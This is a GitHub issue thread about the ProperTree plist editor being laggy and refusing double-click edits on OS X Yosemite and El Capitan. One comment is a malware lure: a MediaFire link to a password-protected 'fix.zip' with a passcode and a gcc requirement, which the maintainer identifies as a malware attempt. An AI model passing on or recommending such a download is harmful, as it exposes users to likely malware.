### ISSUE TITLE
Can't double click to edit and app is generally laggy on Yosemite

### ISSUE THREAD

**Issue by Lost-Entrepreneur439** [corpnewt/ProperTree#181]
I have the latest Python from python.org.

On OS X Yosemite, ProperTree is generally very laggy, and I can't double click to edit anything, if I want to edit something, I have to press enter, then tab to switch to the value section, or if it's a boolean, I simply cannot edit it.

**Comment by corpnewt** [comment]
I don't have any Yosemite installs personally - nor do I plan to install any locally.  That's quite out of the expected support range, so you're welcome to come up with a fix and PR it, but it's not something I'll likely look into.

-CorpNewt

**Comment by andersonsilva87** [comment]
Give this a shot
https://www.mediafire.com/file/kc2tzx0iodbtndd/fix.zip/file
Passcode: changeme
you must have a gcc compiler

**Comment by Lost-Entrepreneur439** [comment]
what was that comment lol

i saw it but had no idea what that mediafire link was

**Comment by corpnewt** [comment]
It was some malware attempt.  A password protected mediafire link that requires you compile something to get it to run - *not at all sketchy*

**Comment by Lost-Entrepreneur439** [comment]
oh yeah i wouldnt let that touch my real hardware with a 10 foot pole lmao

**Comment by EggToaster** [comment]
The issue is also present on El Capitan, at least on my side. Sierra, and High Sierra works fine.
